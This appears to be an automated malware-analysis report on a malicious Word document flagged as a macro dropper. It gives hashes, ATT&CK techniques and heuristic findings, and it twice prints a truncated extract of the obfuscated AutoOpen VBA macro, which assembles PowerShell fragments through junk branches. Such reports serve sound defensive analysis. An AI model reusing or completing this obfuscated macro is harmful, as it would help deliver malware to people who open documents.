Office (OLE) malware analysis — malicious · 98624a3f28b4a20a

MALICIOUS

Office (OLE)

376.5 KB Created: 2018-10-05 03:41:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: 06b530fa1ca1c706b92d66c3b4f0e85d SHA-1: f53448a875bd990c8e6a39cc1917641a8f1e3121 SHA-256: 98624a3f28b4a20a24834ab5cd80a0e1429d94d5a1841d19e4588d330fcb339e

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes obfuscation and calls to Shell() and CreateObject(), indicating it is designed to download and execute a second-stage payload. The heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' specifically points to the reassembly of 'scripting.filesystemobject', a strong indicator of malicious intent.

Heuristics 10

ClamAV: Doc.Dropper.Agent-7154387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7154387-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75837 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75837 bytes
SHA-256: `0585cbf00f3c450f17755880beef2799692da628d4c6a6c94fd8f047e8eef4ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function er() End Function Sub AutoOpen() Const yu_lieu = False Const ueahfm = True Const mjixcp3 = True Const ea_cb_iyfr0 = False Const koey = True Const atuua = False If 7205 <= 1602 Then Const ijvroi0 = True Const kyyaicb = False Const eigloi = False Const ulah = True Const lycwdv = False ElseIf 16 + 9 = 7 Then Else uuueiyfky = "$cdfvibhmunnjq_qa='r" End If Select Case "usaaywcu" Case "usaaywcu" ys_ukc = "sF';$ee" uuueiyfky = uuueiyfky + ys_ukc End Select Const lioeie42 = False If 6104 >= 9008 Then Const yeeug = False Const ukhrryea = False Const utnpu_vn = True Const vxuaygpy = True Const imiag_a = True ElseIf 6772 < 7168 Then ycdxuvqbxhs67 = Environ("SystemRoot") Else Const mhdppy4 = True Const uybluyr7 = True Const cilzt = False Const rhjibvw = True Const aoozpoa = True End If Const urue = False Select Case 42 - 21 Case 21 tzunszww = ee_zyoaie + uuueiyfky tzunszww = tzunszww + "uozlieuoynvsam" End Select Select Case "yfnqhofti" Case "yfnqhofti" yeutee = mezzofgbjmv + tzunszww + zcmaeyvf_o yeutee = yeutee + "y='ion" Case 23242 Const szqo_xbou = False End Select Const tyutc = True Select Case 14 * 13 Case 182 pgqjzkefekp = "Poli';$mc" Const a_gaets = True Const djlaee = False yeutee = yeutee + pgqjzkefekp End Select Const n_fqbr = True Const itgxre = True If 48 - 2 = 50 Then Else kwpoa = yeutee + wxciomz Const stv_obdku = True iuxjo = "nicpqneooaygs=''',';$okmvkhcu_ytvijcgb" kwpoa = kwpoa + iuxjo End If Const kpoesrvz = True Select Case 34 + 33 Case 67 wzivsmhizbw = yiubxfvz + kwpoa + iijwfnhgat Const vquwpnn = True Const ynnohi = True olmnso_rkwdb = "vohly_urvlrrbaby='.W';$xxoydz" wzivsmhizbw = oyksiwp + wzivsmhizbw + olmnso_rkwdb End Select Const jrnko = True Const sdnopko = False If 62 + 39 = 23 Then ElseIf 88 * 63 = 5544 Then ayua = "rll" wzivsmhizbw = wzivsmhizbw + ayua Else Const tfnvfix = False Const y_f_i_osnc = False Const mnxy = True Const pra_bo_o = True Const outhu = True Const u_aufhebx = False Const mittpo = True End If Const mxaeo = False Select Case "uaue_y" Case "uaue_y" wzivsmhizbw = wzivsmhizbw + "u_tcyib_rf_ygnbgewkwik" + m_fnun Case ajqnkxzikk Const ihym = True Case yippcbanw59 Const wgrdgi = False End Select Select Case 13 + 38 Case oaiu_srn7 Const hdunuacn37 = False Case 51 iafdatbb = wzivsmhizbw + aevu7 iafdatbb = iafdatbb + "dymoxbyhv='{ $ua " + viyewvw End Select Const ffyqv01 = False Const trpstzoqfa = False If 50 + 51 = -1 Then Const uz_tiia = False Const ydmf_yph = True Const eyboxvz = True Const ywvj_pyy = True ElseIf 5413 >= 787 Then Dim bnfripksldy, uacluz As String bnfripksldy = "\sys" ycdxuvqbxhs67 = ycdxuvqbxhs67 + bnfripksldy Else Const wexlpdvi = True Const slwiei = False Const gaqz = True Const uie_u = True Const bbpifjr = True Const hipbz = False End If Const gtitpbnxy = False If 59 - 73 = 132 Then Const ohcida = True Const ojyucd = True Const snrfxt = False Const p_uikjo = False Const jfuudjq = True Const bplaye = True Const kfcjpgnzup00 = False Const yyybgrzv = False Const oale = False Const wbsmxyeo = False Else eyuuqpiwj = iafdatbb Const gsux_rh = False Const oixzg = False eyuuqpiwj = eyuuqpiwj + "= ';$y_xzi" End If Const oapyst = True If 7 * 46 = 322 Then asfbjk = eyuuqpiwj Const iupba = False asfbjk = asfbjk + "z" + qwzfww End If Const qjumci = True If 5532 <= 7014 Then o_czviyfdet = asfbjk obcv = "eaefkljyxdoyazcqhsnwcofriob" o_czviyfdet = o_czviyfdet + obcv + ufhlvra ElseIf 50 + 51 = -1 Then Const yhsiu = True Const sgo_vql = False Const frksouimh = True Const qkeabh = True Else End If Select Case 60 * 77 Case 4620 o_czviyfdet = o_czviyfdet + "chs='le(1)';$jncdxoacycyg ... (truncated)

SHA-256: 0585cbf00f3c450f17755880beef2799692da628d4c6a6c94fd8f047e8eef4ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function er()

End Function
Sub AutoOpen()
Const yu_lieu = False
Const ueahfm = True
Const mjixcp3 = True
Const ea_cb_iyfr0 = False
Const koey = True
Const atuua = False

If 7205 <= 1602 Then
Const ijvroi0 = True
Const kyyaicb = False
Const eigloi = False
Const ulah = True
Const lycwdv = False
ElseIf 16 + 9 = 7 Then
Else
uuueiyfky = "$cdfvibhmunnjq_qa='r"
End If
Select Case "usaaywcu"
Case "usaaywcu"
ys_ukc = "sF';$ee"
uuueiyfky = uuueiyfky + ys_ukc
End Select
Const lioeie42 = False

If 6104 >= 9008 Then
Const yeeug = False
Const ukhrryea = False
Const utnpu_vn = True
Const vxuaygpy = True
Const imiag_a = True
ElseIf 6772 < 7168 Then
ycdxuvqbxhs67 = Environ("SystemRoot")
Else
Const mhdppy4 = True
Const uybluyr7 = True
Const cilzt = False
Const rhjibvw = True
Const aoozpoa = True
End If
Const urue = False

Select Case 42 - 21
Case 21
tzunszww = ee_zyoaie + uuueiyfky
tzunszww = tzunszww + "uozlieuoynvsam"
End Select
Select Case "yfnqhofti"
Case "yfnqhofti"
yeutee = mezzofgbjmv + tzunszww + zcmaeyvf_o
yeutee = yeutee + "y='ion"
Case 23242
Const szqo_xbou = False
End Select
Const tyutc = True

Select Case 14 * 13
Case 182
pgqjzkefekp = "Poli';$mc"
Const a_gaets = True
Const djlaee = False
yeutee = yeutee + pgqjzkefekp
End Select
Const n_fqbr = True
Const itgxre = True

If 48 - 2 = 50 Then
Else
kwpoa = yeutee + wxciomz
Const stv_obdku = True
iuxjo = "nicpqneooaygs=''',';$okmvkhcu_ytvijcgb"
kwpoa = kwpoa + iuxjo
End If
Const kpoesrvz = True

Select Case 34 + 33
Case 67
wzivsmhizbw = yiubxfvz + kwpoa + iijwfnhgat
Const vquwpnn = True
Const ynnohi = True
olmnso_rkwdb = "vohly_urvlrrbaby='.W';$xxoydz"
wzivsmhizbw = oyksiwp + wzivsmhizbw + olmnso_rkwdb
End Select
Const jrnko = True
Const sdnopko = False

If 62 + 39 = 23 Then
ElseIf 88 * 63 = 5544 Then
ayua = "rll"
wzivsmhizbw = wzivsmhizbw + ayua
Else
Const tfnvfix = False
Const y_f_i_osnc = False
Const mnxy = True
Const pra_bo_o = True
Const outhu = True
Const u_aufhebx = False
Const mittpo = True
End If
Const mxaeo = False

Select Case "uaue_y"
Case "uaue_y"
wzivsmhizbw = wzivsmhizbw + "u_tcyib_rf_ygnbgewkwik" + m_fnun
Case ajqnkxzikk
Const ihym = True
Case yippcbanw59
Const wgrdgi = False
End Select
Select Case 13 + 38
Case oaiu_srn7
Const hdunuacn37 = False
Case 51
iafdatbb = wzivsmhizbw + aevu7
iafdatbb = iafdatbb + "dymoxbyhv='{ $ua " + viyewvw
End Select
Const ffyqv01 = False
Const trpstzoqfa = False

If 50 + 51 = -1 Then
Const uz_tiia = False
Const ydmf_yph = True
Const eyboxvz = True
Const ywvj_pyy = True
ElseIf 5413 >= 787 Then
Dim bnfripksldy, uacluz As String
bnfripksldy = "\sys"
ycdxuvqbxhs67 = ycdxuvqbxhs67 + bnfripksldy
Else
Const wexlpdvi = True
Const slwiei = False
Const gaqz = True
Const uie_u = True
Const bbpifjr = True
Const hipbz = False
End If
Const gtitpbnxy = False

If 59 - 73 = 132 Then
Const ohcida = True
Const ojyucd = True
Const snrfxt = False
Const p_uikjo = False
Const jfuudjq = True
Const bplaye = True
Const kfcjpgnzup00 = False
Const yyybgrzv = False
Const oale = False
Const wbsmxyeo = False
Else
eyuuqpiwj = iafdatbb
Const gsux_rh = False
Const oixzg = False
eyuuqpiwj = eyuuqpiwj + "= ';$y_xzi"
End If
Const oapyst = True

If 7 * 46 = 322 Then
asfbjk = eyuuqpiwj
Const iupba = False
asfbjk = asfbjk + "z" + qwzfww
End If
Const qjumci = True

If 5532 <= 7014 Then
o_czviyfdet = asfbjk
obcv = "eaefkljyxdoyazcqhsnwcofriob"
o_czviyfdet = o_czviyfdet + obcv + ufhlvra
ElseIf 50 + 51 = -1 Then
Const yhsiu = True
Const sgo_vql = False
Const frksouimh = True
Const qkeabh = True
Else
End If
Select Case 60 * 77
Case 4620
o_czviyfdet = o_czviyfdet + "chs='le(1)';$jncdxoacycyg
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.